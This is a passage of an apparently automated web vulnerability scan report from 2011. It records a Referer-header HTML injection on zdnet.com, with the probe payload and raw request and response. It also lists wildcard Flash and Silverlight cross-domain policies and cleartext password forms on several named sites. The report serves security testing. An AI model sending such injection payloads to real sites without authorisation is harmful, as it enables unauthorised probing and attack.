Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22623%22%2C%22longittude%22%3A%22-96.799%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22dallas%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2277%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2232.787%22%7D; expires=Thu, 12-Jan-2012 05:09:29 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 119848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
/adlog.com.com/adlog/i/r=6455&amp;sg=1815&amp;o=10%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2000&amp;nd=10&amp;pid=&amp;cid=0&amp;pp=100&amp;e=&amp;rqid=01c13-ad-e7:4D2CE7575A872D&amp;orh=b55d0"><a>dadba004ac&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=b55d0">
...[SNIP]...

3.79. http://www.zdnet.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2e14"><a>7f6f3d790ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: a2e14"><a>7f6f3d790ed

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 05:11:56 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22623%22%2C%22longittude%22%3A%22-96.799%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22dallas%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2277%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2232.787%22%7D; expires=Thu, 12-Jan-2012 05:11:56 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=996
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 119975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
log.com.com/adlog/e/r=18117&amp;sg=478730&amp;o=10%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2000&amp;nd=10&amp;pid=&amp;cid=0&amp;pp=100&amp;e=&amp;rqid=01c13-ad-e2:4D2CD2ED74559F&amp;orh=a2e14"><a>7f6f3d790ed&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=a2e14">
...[SNIP]...

4. Flash cross-domain policy  previous  next
There are 9 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad.crwdcntrl.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.crwdcntrl.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:00:25 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Tue, 09 Jun 2009 18:20:38 GMT
ETag: "2e70196-a5-46bee6a616980"
Accept-Ranges: bytes
Content-Length: 165
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control    permitted-cross-domain-policies="master-only" />
   <allow-access-from    domain="*" />
</cross-domain-policy>

4.2. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Wed, 12 Jan 2011 03:00:27 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.3. http://ad.uk.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.uk.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 17:22:35 GMT
Date: Wed, 12 Jan 2011 03:00:28 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.4. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Thu, 13 Jan 2011 03:00:25 GMT
Date: Wed, 12 Jan 2011 03:00:25 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.5. http://bs.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:25 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


4.6. http://ad.wsod.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 12 Jan 2011 03:00:27 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "906968-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

4.7. http://adlog.com.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adlog.com.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adlog.com.com

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:00:27 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 6975
Keep-Alive: timeout=15, max=790
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsaroundtheworld.com" />
<allow-access-from domain="*.cbsgames.com" />
<allow-access-from domain="*.cbsig.net"/>
<allow-access-from domain="*.cbsnews.com" />
<allow-access-from domain="*.cbssports.com" />
<allow-access-from domain="*.chat.com" />
<allow-access-from domain="*.chow.com" />
<allow-access-from domain="*.chowhound.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.filmspot.com" />
<allow-access-from domain="*.findarticles.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamerankings.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.help.com" />
<allow-access-from domain="*.iphoneatlas.com" />
<allow-access-from domain="*.itpapers.com" />
<allow-access-from domain="*.juke.com" />
<allow-access-from domain="*.last.fm" />
<allow-access-from domain="*.macfixit.com" />
<allow-access-from domain="*.macfixitforums.com" />
<allow-access-from domain="*.maxpreps.com" />
<allow-access-from domain="*.metacritic.com" />
<allow-access-from domain="*.mp3.com" />
<allow-access-from domain="*.moblogic.tv" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.movietome.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.ncaa.com" />
<allow-access-from domain="*.news.com" />
<allow-access-from domain="*.ourchart.com" />
<allow-access-from domain="*.reuters.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shareware.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.smartplanet.com" />
<allow-access-from domain="*.sportsgamer.com" />
<allow-access-from domain="*.sportsline.com" />
<allow-access-from domain="*.startrek.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.theinsider.com" />
<allow-access-from domain="*.trupreps.com" />
<allow-access-from domain="*.tv.com" />
<allow-access-from domain="*.urbanbaby.com" />
<allow-access-from domain="*.versiontracker.com" />
<allow-access-from domain="*.wallstrip.com" />
<allow-access-from domain="*.webware.com" />
<allow-access-from domain="*.winfiles.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.zdnet.com.au" />
<allow-access-from domain="*.zdnet.com.uk" />
<allow-access-from domain="*.zdnetasia.com" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.powervideosuite.com" />
...[SNIP]...
<allow-access-from domain="*.clipsync.com"/>
...[SNIP]...
<allow-access-from domain="212.86.251.190"/>
...[SNIP]...
<allow-access-from domain="*.crunchyroll.com" />
...[SNIP]...
<allow-access-from domain="*.techmatter.com" />
...[SNIP]...
<allow-access-from domain="*.amazon.com" />
...[SNIP]...
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.att.com" />
<allow-access-from domain="*.attributor.com" />
<allow-access-from domain="*.bebo.com" />
<allow-access-from domain="*.blinkx.com" />
<allow-access-from domain="*.boxee.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.buddytv.com" />
<allow-access-from domain="*.cbsmobile.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.comcast.com" />
<allow-access-from domain="*.comcastnet.com" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.et.com" />
<allow-access-from domain="*.fanpop.com" />
<allow-access-from domain="*.freestream.com" />
<allow-access-from domain="*.fuhu.com" />
<allow-access-from domain="*.gotuit.com" />
<allow-access-from domain="*.grabnetworks.com" />
<allow-access-from domain="*.harpers.com" />
<allow-access-from domain="*.hp.com" />
<allow-access-from domain="*.imdb.com" />
<allow-access-from domain="*.iwidget.com" />
<allow-access-from domain="*.joost.com" />
<allow-access-from domain="*.meevee.com" />
<allow-access-from domain="*.metacafe.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="*.msnsearch.com" />
<allow-access-from domain="*.netflix.com" />
<allow-access-from domain="*.radio.com" />
<allow-access-from domain="*.sands.com" />
<allow-access-from domain="*.showtime.com" />
<allow-access-from domain="*.slide.com" />
<allow-access-from domain="*.sling.com" />
<allow-access-from domain="*.sony.com" />
<allow-access-from domain="*.tidaltv.com" />
<allow-access-from domain="*.transpond.com" />
<allow-access-from domain="*.tvguide.com" />
<allow-access-from domain="*.tvstations.com" />
<allow-access-from domain="*.veoh.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...
<allow-access-from domain="*.bing.com" />
...[SNIP]...
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.fancast.com" />
<allow-access-from domain="*.blinx.com" />
<allow-access-from domain="apps.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.ytimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ustream.tv"/>
...[SNIP]...
<allow-access-from domain="*.sho.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsinteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsimg.net" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net"/>
...[SNIP]...
<allow-access-from domain="*.yimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ooyala.com"/>
...[SNIP]...
<allow-access-from domain="*.yldmgrimg.net"/>
...[SNIP]...
<allow-access-from domain="*.cstv.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonder.com"/>
...[SNIP]...
<allow-access-from domain="*.maxpreps.com.edgesuite.net"/>
...[SNIP]...
<allow-access-from domain="*.livestream.com"/>
...[SNIP]...
<allow-access-from domain="*.justin.tv"/>
...[SNIP]...

4.8. http://www.walmart.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.walmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.walmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15
Last-Modified: Fri, 19 Jun 2009 00:03:46 GMT
ETag: "11b9b-137-46ca84217bc80"
Cache-Control: max-age=7200
Expires: Wed, 12 Jan 2011 17:26:34 GMT
Content-Type: application/xml
Date: Wed, 12 Jan 2011 15:26:34 GMT
Content-Length: 311
Connection: close
Set-Cookie: NSC_xxx.xbmnbsu.dpn-mc=ffffffff0907974245525d5f4f58455e445a4a423660;path=/
Set-Cookie: dcenv=edc; path=/; domain=walmart.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.walmart.com" />
<allow-access-from domain="*.richfx.com" />
<allow-access-from domain="*.edgesuite.net" />
...[SNIP]...

4.9. http://www.washingtonpost.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.washingtonpost.com

Response

HTTP/1.1 200 OK
Server: Web Server
Date: Wed, 12 Jan 2011 15:26:41 GMT
Cache-control: max-age=60
Expires: Wed, 12 Jan 2011 15:27:41 GMT
Content-type: text/xml
Last-modified: Thu, 08 Apr 2010 15:51:21 GMT
Content-length: 478
Etag: "1de-4bbdfb79"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.washingtonpost.com" />
<allow-access-from domain="admin.brightcove.com" />
<allow-access-from domain="*.newsweek.com"/>
<allow-access-from domain="*.digitalink.com"/>
<allow-access-from domain="*.slate.com"/>
<allow-access-from domain="livingstories.googlelabs.com" />
...[SNIP]...

5. Silverlight cross-domain policy  previous  next
There are 3 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Wed, 12 Jan 2011 03:00:27 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://ad.uk.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.uk.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 14:50:55 GMT
Date: Wed, 12 Jan 2011 03:00:28 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.3. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Thu, 13 Jan 2011 03:00:25 GMT
Date: Wed, 12 Jan 2011 03:00:25 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

6. Cleartext submission of password  previous  next
There are 10 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://account.theregister.co.uk/register/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://account.theregister.co.uk
Path:   /register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /register/ HTTP/1.1
Host: account.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:12:21 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 30609

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</h2>


<form action="http://account.theregister.co.uk/register/" method="post" id="acc-edit">
<input type="hidden" name="product" value="theregister_newsletter">
...[SNIP]...
<td><input type="password" name="password" value="" size="30"></td>
...[SNIP]...
<td><input type="password" name="confirm_password" value="" size="30"></td>
...[SNIP]...

6.2. http://digg.com/submit  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:34:26 GMT; path=/; domain=digg.com
Set-Cookie: d=2d42bedfcbae53b8ee6f61a9c9010100cced8e8e45672361cf74370761950c78; expires=Mon, 11-Jan-2021 13:42:06 GMT; path=/; domain=.digg.com
X-Digg-Time: D=22051 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7384

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

6.3. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.theregister.co.uk
Path:   /forum/1/2011/01/07/open_source_crypto_curbs/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /forum/1/2011/01/07/open_source_crypto_curbs/ HTTP/1.1
Host: forums.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:26 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 46429


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<
...[SNIP]...
</div>


<form method=POST action="http://forums.theregister.co.uk/post/submit/2011/01/07/open_source_crypto_curbs/" class=box id=comment-form name=comment-form>

<h3>
...[SNIP]...
<div><input name=password type=password></div>
...[SNIP]...

6.4. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.theregister.co.uk
Path:   /forum/1/2011/01/07/open_source_crypto_curbs/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /forum/1/2011/01/07/open_source_crypto_curbs/ HTTP/1.1
Host: forums.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:26 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 46429


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<
...[SNIP]...
</p>
<form method=POST action="http://account.theregister.co.uk/login/">
<input type=hidden name=r value="http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/">
...[SNIP]...
</span>
<input class=text type=password name=password></label>
...[SNIP]...

